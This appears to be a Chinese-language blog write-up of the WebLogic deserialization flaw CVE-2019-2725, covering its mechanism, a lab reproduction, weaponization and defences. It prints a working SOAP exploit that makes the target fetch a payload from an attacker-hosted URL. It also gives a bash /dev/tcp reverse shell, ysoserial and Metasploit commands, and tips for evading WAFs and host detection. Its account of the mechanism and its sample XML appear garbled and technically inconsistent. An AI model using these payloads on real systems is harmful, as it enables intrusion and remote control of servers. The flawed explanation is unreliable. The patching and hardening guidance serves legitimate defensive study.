CVE-2019-2725漏洞深度剖析：从XML反序列化到WebLogic攻防实战

1. 项目概述：一个被低估的“定时炸弹”

几年前，当安全圈的朋友们聊起WebLogic的漏洞，CVE-2019-2725这个名字可能不像“永恒之蓝”那样如雷贯耳，但它绝对是一个在特定场景下威力巨大、且极具代表性的“定时炸弹”。我处理过不少由这个漏洞引发的安全事件，从内网漫游到服务器沦陷，其利用链的巧妙和危害的隐蔽性，都让我印象深刻。简单来说，这是一个存在于Oracle WebLogic Server Web服务组件中的反序列化漏洞，攻击者能够通过构造特定的XML数据，在未授权的情况下远程执行任意代码。听起来很技术？你可以把它想象成：你家的智能门锁（WebLogic的某个服务）接受一种特定格式的指令（XML），但设计时没检查指令的真伪，结果攻击者伪造了一个“开门”指令，系统就乖乖照办了，直接把整个家的控制权交了出去。

这个漏洞影响范围极广，波及WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3等多个主流版本，而WebLogic作为企业级Java应用服务器的中流砥柱，在金融、电信、政府等领域有着海量的部署。更关键的是，其利用方式并非简单的“一点就破”，它涉及对WebLogic内部处理机制、XML反序列化流程以及Java类加载机制的深度理解。对于安全研究人员，剖析它能深入理解Java反序列化漏洞的经典模式；对于企业运维和安全人员，掌握它能有效进行防御布控和应急响应；对于红队队员，它则是一个绕过常规防御、直击内网核心的利器。今天，我就结合多次实战分析和复现的经验，把这个漏洞从里到外、从原理到利用，掰开揉碎了讲清楚。

2. 漏洞原理深度拆解：XML反序列化的“信任”陷阱

要理解CVE-2019-2725，必须抓住两个核心：“wls9-async”组件和**“XML反序列化”**。这不仅仅是两个技术名词，更是整个漏洞链条的起点和关键执行点。

2.1 漏洞入口：被默认开启的“异步通信服务”

WebLogic的/wls-wsat/CoordinatorPortType、/wls-wsat/RegistrationPortType等端点，属于“WebLogic Web Services Atomic Transaction”组件的一部分，用于支持Web服务的异步通信。问题在于，这个服务在受影响版本的WebLogic中通常是默认开启的，并且不需要任何身份认证即可访问。这就好比在你家院子角落，默认开了一扇供邮差投递的小门，但这扇门既没上锁，也没人看管。

攻击者可以直接向这些端点发送HTTP POST请求。服务端收到请求后，会调用特定的处理类（如weblogic.wsee.jaxws.workcontext.WorkContextServerTube）来处理请求中的SOAP消息。而漏洞的触发点，就藏在处理SOAP消息头（Header）中一个名为<work:WorkContext>的特定元素时。

2.2 核心触发：从XML到Java对象的危险转换

这里就进入了漏洞最核心的部分——XML反序列化。WorkContextServerTube类在解析<work:WorkContext>标签内的XML数据时，使用了一个叫weblogic.wsee.workarea.WorkContextXmlInputAdapter的类。这个类的readUTF()方法会调用weblogic.workarea.spi.WorkContextXmlParser的parse()方法。

关键的一步来了：在parse()方法中，WebLogic使用了一个来自JDK的java.io.ObjectInputStream来反序列化XML数据。ObjectInputStream的功能是将序列化后的字节流还原成Java对象。在反序列化过程中，它会根据流中的数据自动调用对象的readObject()方法。这本是Java对象持久化和传输的标准机制，但前提是：你必须完全信任你所反序列化的数据来源。

WebLogic在这里犯了一个致命的错误：它无条件地信任了来自客户端（即攻击者）的XML输入，并将其直接交给ObjectInputStream处理。攻击者可以在XML中嵌入一个经过精心构造的、序列化后的恶意Java对象。当WebLogic解析这个XML时，ObjectInputStream会忠实地执行这个恶意对象readObject()方法中的代码，从而执行任意命令。

2.3 利用链构造：为什么是oracle.toplink.internal.sessions.UnitOfWorkChangeSet

理解了反序列化这个“枪”之后，我们还需要一颗“子弹”。在CVE-2019-2725的公开利用中，最常用的“子弹”就是利用oracle.toplink.internal.sessions.UnitOfWorkChangeSet这个类。

这个类本身是WebLogic内置的（属于EclipseLink库，用于数据持久化），它有一个readObject()方法。在反序列化时，这个方法会调用this.xmlReader.read()。而this.xmlReader是一个java.io.BufferedReader，它又关联着一个java.io.InputStream。

攻击者的巧妙之处在于：他们通过XML外部实体（XXE）注入，控制了this.xmlReader读取的来源。他们可以将其指向一个包含恶意Java序列化数据的URL。当UnitOfWorkChangeSet的readObject()方法执行到this.xmlReader.read()时，它就会去读取攻击者指定的URL内容，并将这些内容（恶意序列化数据）再次传递给ObjectInputStream进行反序列化。

注意：这里存在一个“二次反序列化”的过程。第一次是WebLogic解析攻击者最初的XML，触发了UnitOfWorkChangeSet的反序列化；第二次是在UnitOfWorkChangeSet的readObject()方法内部，它又从远程URL读取了另一段序列化数据并反序列化。这第二段数据，才是最终承载执行命令代码的“终极炮弹”，通常是一个构造好的java.lang.Runtime.exec()调用链。

这种利用方式之所以成功，是因为UnitOfWorkChangeSet类不在WebLogic默认的反序列化类黑名单（weblogic.security.utils.FilteringObjectInputStream）之内，从而绕过了基础的防护。

原理小结：漏洞利用链可以概括为：访问默认开放的无认证端点 -> 提交包含恶意<work:WorkContext>的SOAP请求 -> 触发WebLogic对XML数据的危险反序列化 -> 利用内置的UnitOfWorkChangeSet类进行XXE引导 -> 发起二次反序列化加载远程恶意代码 -> 实现远程命令执行。

3. 实战环境搭建与漏洞复现

纸上得来终觉浅，绝知此事要躬行。下面我们搭建一个靶场，亲手把这个漏洞复现一遍。请务必在授权的、隔离的测试环境中进行以下操作。

3.1 靶场环境准备

我推荐使用Docker来快速搭建一个包含漏洞的WebLogic环境，这是最安全、最便捷的方式。

1. 拉取漏洞镜像：网络上有很多安全研究者构建好的漏洞靶场镜像。我们可以使用一个常见的版本。

   docker pull vulhub/weblogic:10.3.6.0-2017 # 这个镜像通常已经集成了CVE-2019-2725所需的环境

2. 启动容器：

   docker run -d -p 7001:7001 -p 8453:8453 --name weblogic-2725 vulhub/weblogic:10.3.6.0-2017

   这里将WebLogic的管理控制台端口（7001）和漏洞可能利用的端口映射到宿主机。

3. 环境验证：等待几分钟后，在浏览器访问http://your-host-ip:7001/console。如果能看到WebLogic管理控制台的登录页面，说明环境启动成功。我们的目标不是控制台，而是那个存在漏洞的异步服务。

3.2 手工漏洞探测与验证

在利用之前，我们先确认目标是否存在漏洞。漏洞端点通常是：

• http://your-host-ip:7001/_async/AsyncResponseService
• http://your-host-ip:7001/wls-wsat/CoordinatorPortType
• http://your-host-ip:7001/wls-wsat/RegistrationPortType

我们可以发送一个简单的POST请求进行探测。使用curl命令或者Burp Suite等工具。

curl -X POST http://192.168.1.100:7001/wls-wsat/CoordinatorPortType -H "Content-Type: text/xml" -d '<test>hello</test>'

观察返回。如果返回错误信息中包含weblogic.wsee.workarea.WorkContextException、WorkContext等相关字样，或者返回一个空的SOAP响应，而不是直接的404 Not Found，则强烈表明该端点存在且可能可被利用。

一个更准确的验证方式是发送一个合法的SOAP信封结构，但包含一个空的或不完整的WorkContext，看服务端的解析反应。

POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.1.100:7001 Content-Type: text/xml Content-Length: ... <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <!-- 这里将是我们的恶意载荷 --> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

如果服务器返回一个SOAP格式的响应（即使是错误），也说明该服务正在运行并处理了我们的请求。

3.3 构造并执行漏洞利用载荷

这里我们演示一种经典的利用方式，即通过UnitOfWorkChangeSet触发XXE，加载远程恶意序列化对象来执行命令。整个过程分为三步：

第一步：生成最终执行命令的恶意序列化对象。我们需要创建一个能执行Runtime.getRuntime().exec(“命令”)的Java对象链，并将其序列化。通常使用ysoserial工具中的CommonsCollections链（例如CommonsCollections1、CommonsCollections2等，具体取决于目标WebLogic的ClassPath）。假设我们要执行命令touch /tmp/success_cve-2019-2725。

# 使用ysoserial生成序列化数据，并输出到文件 java -jar ysoserial.jar CommonsCollections1 "touch /tmp/success_cve-2019-2725" > payload.ser

第二步：在攻击机上启动一个HTTP服务，用于托管上一步生成的payload.ser文件。

python3 -m http.server 8888 # 现在，http://your-attack-ip:8888/payload.ser 可以访问到这个恶意序列化文件。

第三步：构造完整的XML攻击载荷，发送给目标。这个XML载荷的核心是：在<work:WorkContext>中嵌入一个序列化的UnitOfWorkChangeSet对象，该对象在其xmlReader属性中，通过XXE指向我们第二步搭建的HTTP服务上的payload.ser文件。

一个简化的载荷结构如下（实际需要精确的序列化字节的十六进制表示或Base64编码）：

POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.1.100:7001 Content-Type: text/xml Content-Length: ... <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="oracle.toplink.internal.sessions.UnitOfWorkChangeSet"> <void property="shouldWriteChanges"> <boolean>true</boolean> </void> <void property="xmlReader"> <object class="java.io.BufferedReader"> <object class="java.io.InputStreamReader"> <object class="java.io.InputStreamReader"> <!-- 关键：通过URL发起请求，加载远程payload --> <object class="java.net.URL"> <string>http://your-attack-ip:8888/payload.ser</string> </object> <string>UTF-8</string> </object> </object> </object> </void> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

实操心得：在实际构造中，我们通常不会直接手写这么复杂的XML，而是利用现成的漏洞利用框架（如Metasploit）或者编写Python/Java脚本，自动将UnitOfWorkChangeSet的序列化字节流进行适当的编码（如Base64或十六进制），然后嵌入到XML中。手工构造极易出错，重点是理解这个结构。

第四步：发送请求，验证结果。将上述构造好的HTTP请求发送到目标WebLogic服务器。如果漏洞存在且利用成功：

1. 你的HTTP服务器（端口8888）会收到一个来自目标服务器的、对payload.ser文件的GET请求。
2. 目标服务器会反序列化这个payload.ser文件，并执行其中嵌入的命令（在我们的例子中，是在目标服务器的/tmp目录下创建一个名为success_cve-2019-2725的文件）。

你可以登录到WebLogic容器内部去检查文件是否创建成功：

docker exec -it weblogic-2725 /bin/bash ls -la /tmp/success_cve-2019-2725

4. 漏洞利用的进阶技巧与武器化

在实战中，直接执行touch命令只是验证。真正的利用需要更隐蔽、更稳定、功能更强大的方式。

4.1 命令执行与交互式Shell获取

创建文件是单向的，我们更需要一个反向Shell（Reverse Shell）来获得交互式控制。

1. 生成反向Shell载荷：使用msfvenom或nc命令生成。

   # 使用bash反向Shell（假设攻击机IP为192.168.1.50，监听端口4444） # 注意需要对命令进行URL编码或Base64编码以避免XML解析问题 bash -i >& /dev/tcp/192.168.1.50/4444 0>&1 # 可以将其Base64编码：YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNTAvNDQ0NCAwPiYx

2. 构造最终攻击命令：将解码并执行反向Shell的命令嵌入到ysoserial的payload中。由于命令可能包含特殊字符，一种稳妥的方式是将其写入一个脚本文件再执行。

   echo -n 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' | base64 -d | bash

   对应的ysoserial命令可能是：

   java -jar ysoserial.jar CommonsCollections2 "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNTAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}'" > reverse.ser

3. 在攻击机开启监听：

   nc -lvnp 4444

4. 发送利用载荷：将托管reverse.ser的URL放入XML攻击载荷中，发送请求。成功后，你将在nc监听端口中获得一个来自目标服务器的bash shell。

4.2 利用工具化：Metasploit模块解析

手工构造虽然有助于理解原理，但效率低。Metasploit框架提供了成熟的利用模块（exploit/multi/http/weblogic_deserialize_asyncresponseservice），它自动化了上述所有步骤。

1. 加载模块并配置参数：

   msf6 > use exploit/multi/http/weblogic_deserialize_asyncresponseservice msf6 exploit(weblogic_deserialize_asyncresponseservice) > set RHOSTS 192.168.1.100 msf6 exploit(weblogic_deserialize_asyncresponseservice) > set RPORT 7001 msf6 exploit(weblogic_deserialize_asyncresponseservice) > set TARGETURI /_async/AsyncResponseService # 根据实际情况修改路径 msf6 exploit(weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.1.50 msf6 exploit(weblogic_deserialize_asyncresponseservice) > set LPORT 4444

2. 选择Payload：模块支持多种Payload，如反向Shell、Meterpreter等。Meterpreter功能更强大。

   msf6 exploit(weblogic_deserialize_asyncresponseservice) > set PAYLOAD java/meterpreter/reverse_tcp

3. 执行攻击：

   msf6 exploit(weblogic_deserialize_asyncresponseservice) > exploit

   如果成功，你将获得一个Meterpreter会话，可以执行文件操作、提权、信息搜集、横向移动等一系列后渗透动作。

注意事项：Metasploit模块的利用链可能基于特定的ysoserialgadget链（如CommonsCollections1）。如果目标环境因为JDK版本、ClassPath差异导致该链不生效，攻击会失败。这时可能需要手动分析环境，调整或选择其他gadget链（如CommonsCollections2、CommonsCollections3、CommonsBeanutils1等），这也是手工复现价值所在。

4.3 绕过防御与隐蔽利用

随着该漏洞的普及，防守方也增加了各种防护措施。

1. 路径黑名单：很多WAF或安全设备会拦截包含/wls-wsat/、/_async/的请求。绕过思路：

   • 路径混淆：尝试使用大小写变形（如/Wls-Wsat/）、多余斜杠（///wls-wsat///）、URL编码（%2f%77%6c%73%2d%77%73%61%74%2f）等方式。
   • 利用其他端点：除了常见的两个，研究其他可能触发相同反序列化逻辑的端点。
   • 前端代理后真实路径：目标可能通过Nginx/Apache反向代理，外部路径与内部WebLogic路径不同，需要信息搜集。

2. 流量特征检测：攻击载荷中包含特定的类名（oracle.toplink.internal.sessions.UnitOfWorkChangeSet）和序列化数据特征。绕过思路：

   • 类名混淆：对XML中的类名进行双URL编码、Unicode编码等。
   • 载荷编码与分片：将整个恶意XML进行Base64编码后传输，或在SOAP消息体中分片传输。
   • 使用替代gadget链：寻找其他不在常见特征库中的、可利用的WebLogic内置类来构造利用链。

3. 主机层防护：安装了杀毒软件或HIDS（主机入侵检测系统）。绕过思路：

   • 无文件落地：利用漏洞直接向内存中写入Shellcode或加载恶意类，避免在磁盘上创建可执行文件。
   • 执行无害命令探测：初始探测使用whoami、id、ping等看似正常的命令，避免触发敏感告警。
   • 使用纯内存的Meterpreter：配合java/meterpreter/reverse_tcp等Payload，大部分操作在内存中完成。

5. 漏洞防御与修复指南

作为防御方，面对CVE-2019-2725这样的高危漏洞，必须采取多层次、立体的防御策略。

5.1 紧急临时处置措施

如果无法立即升级，应立即采取以下临时加固措施：

1. 删除或禁用漏洞组件：这是最直接有效的方法。找到WebLogic安装目录下的wls-wsat.war和async相关应用包，直接删除或重命名。

   • 通常路径为：$WEBLOGIC_HOME/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/和$WEBLOGIC_HOME/wlserver_10.3/server/lib/。
   • 删除后，需要重启WebLogic服务才能生效。

   注意：直接删除文件可能在后续补丁或升级时带来问题。更推荐通过控制台禁用。

2. 通过控制台禁用服务：

   • 登录WebLogic管理控制台 (http://host:port/console)。
   • 在左侧域结构中找到“部署”。
   • 在部署列表中，找到“wls-wsat”和“async”（可能显示为“bea_wls9_async_response”等）。
   • 选中它们，点击“停止” -> “为所有请求提供服务”。确保其状态变为“未活动”。
   • 同样，重启服务后生效。

3. 网络层访问控制：在防火墙或WebLogic前端的代理服务器（如Nginx）上，配置规则，直接拦截或返回错误码给对/_async/*和/wls-wsat/*路径的访问请求。Nginx配置示例：

   location ~ ^/(_async|wls-wsat)/ { deny all; return 403; }

5.2 官方补丁升级

长期根本的解决方案是安装Oracle官方发布的补丁。对于CVE-2019-2725，Oracle在2019年4月和7月的关键补丁更新（CPU）中进行了修复。

1. 确定你的WebLogic版本：查看$WEBLOGIC_HOME/.product.properties文件或管理控制台首页。
2. 访问Oracle官方支持网站：根据你的具体版本（如10.3.6.0），下载对应的关键补丁更新（CPU）。例如，对于10.3.6.0，需要安装2019年4月（CPU Apr 2019）及之后的补丁。
3. 仔细阅读补丁说明：确认该补丁确实包含了针对CVE-2019-2725的修复。
4. 按照Oracle官方指南进行补丁安装：通常使用OPatch工具。务必在测试环境验证后再应用到生产环境。

5.3 纵深防御体系建设

单点修补不足以应对未来的威胁，需要构建体系化的防御。

1. 最小权限原则：运行WebLogic服务的操作系统账户，不应具有过高权限（如root/Administrator）。使用专用低权限账户。
2. 网络隔离与分段：将WebLogic服务器部署在内网，严格限制外部访问。只开放必要的业务端口（如7001, 80, 443），管理控制台端口禁止从互联网访问。
3. 部署Web应用防火墙（WAF）：配置WAF规则，拦截包含WorkContext、UnitOfWorkChangeSet、XMLDecoder等关键词的异常SOAP请求，以及检测反序列化攻击的通用特征。
4. 启用WebLogic自身安全特性：
   • 配置反序列化过滤器：在WebLogic 12.2.1及以上版本，可以配置weblogic.security.utils.FilteringObjectInputStream来定义更严格的反序列化类白名单。
   • 使用安全域（Security Realm）：为所有服务，包括可能被忽略的Web Service端点，配置强制身份认证。
5. 常态化安全监测：
   • 日志审计：开启并定期分析WebLogic访问日志（access.log）和诊断日志（diagnostic.log），关注对可疑路径的访问和异常错误堆栈（如ClassNotFoundException,InvalidClassException等）。
   • 入侵检测：在主机层部署HIDS，监控WebLogic进程的异常子进程启动行为（如突然执行bash、cmd、powershell）。
   • 定期漏洞扫描：使用Nexpose, Nessus, OpenVAS等工具定期对WebLogic服务进行漏洞扫描。

6. 从CVE-2019-2725看Java反序列化漏洞的攻防

CVE-2019-2725绝非孤例，它是Java反序列化漏洞家族中的一个典型代表。剖析它，能为我们理解整个攻防面打开一扇窗。

6.1 漏洞模式的共性

这类漏洞通常遵循一个模式：“不可信数据源 -> 危险反序列化API -> 可利用的类（Gadget Chain） -> 代码执行”。

• 不可信数据源：HTTP请求参数、RMI通信、JMX、JMS消息、文件上传、数据库存储等。CVE-2019-2725的数据源是SOAP消息头。
• 危险API：ObjectInputStream.readObject(),XMLDecoder.readObject(),XStream.fromXML(),ObjectMapper.readValue()等。它们默认信任输入数据。
• Gadget Chain：一系列在ClassPath中存在的、可被串联起来的类，其方法调用最终能导向危险操作（如Runtime.exec()、ProcessBuilder.start()、JNDI注入、反射调用等）。UnitOfWorkChangeSet只是其中一环。

6.2 攻击者的武器库演变

从最初的Apache Commons Collections链，到Spring、Groovy、Jython、Jboss、Mozilla Rhino等各种第三方库中的gadget被挖掘出来，攻击者的武器库日益丰富。工具也从ysoserial发展到功能更强大的marshalsec。攻击思路也从直接执行命令，发展到加载远程类（JNDI注入）、写入内存马（WebShell in Memory）等更隐蔽的方式。

6.3 防御思路的升级

防御也在不断进化：

1. 输入验证与过滤：对反序列化操作的数据源进行严格的白名单校验。
2. 类黑名单/白名单：像WebLogic自己的FilteringObjectInputStream，或使用SerialKiller、Hessian的白名单机制。白名单优于黑名单。
3. 升级与替换：升级存在危险gadget的第三方库版本；用更安全的序列化方案（如JSON、Protocol Buffers）替换Java原生序列化。
4. 运行时防护：使用Java Agent技术进行运行时监控，如RASP（运行时应用自保护），在readObject()等关键方法被调用时进行栈回溯检查，拦截恶意gadget链的调用。
5. 代码审计：在代码层面，避免直接反序列化不可信数据。如果必须，使用ObjectInputStream时重写resolveClass方法进行严格校验。

6.4 对开发与运维的启示

对于开发人员：永远不要反序列化不受信任的数据。这是一个安全铁律。在代码评审时，要格外关注任何涉及ObjectInputStream、XMLDecoder、XStream、Jackson的enableDefaultTyping()、Fastjson的autoType等功能的代码。

对于运维和安全人员：资产清点和补丁管理是生命线。必须清楚知道内网有多少个WebLogic实例，它们的版本、补丁情况、开放了哪些服务。像/wls-wsat/这种默认开启的非业务关键服务，应在安全基线的配置规范中明确要求禁用。建立快速的漏洞应急响应流程，对于此类已出现利用代码的N-day漏洞，必须在极短时间内完成排查和处置。

CVE-2019-2725就像一面镜子，照出了在复杂的企业级中间件中，一个微小的设计疏忽（默认开启、无需认证、危险反序列化）如何演变成一条直通核心的攻击路径。它的价值不仅在于教会我们如何利用一个具体的漏洞，更在于让我们深刻理解Java反序列化这一大类安全问题的本质、演变和对抗方法，从而在未来的工作中，无论是攻击、防御还是开发，都能多一份警惕和洞察。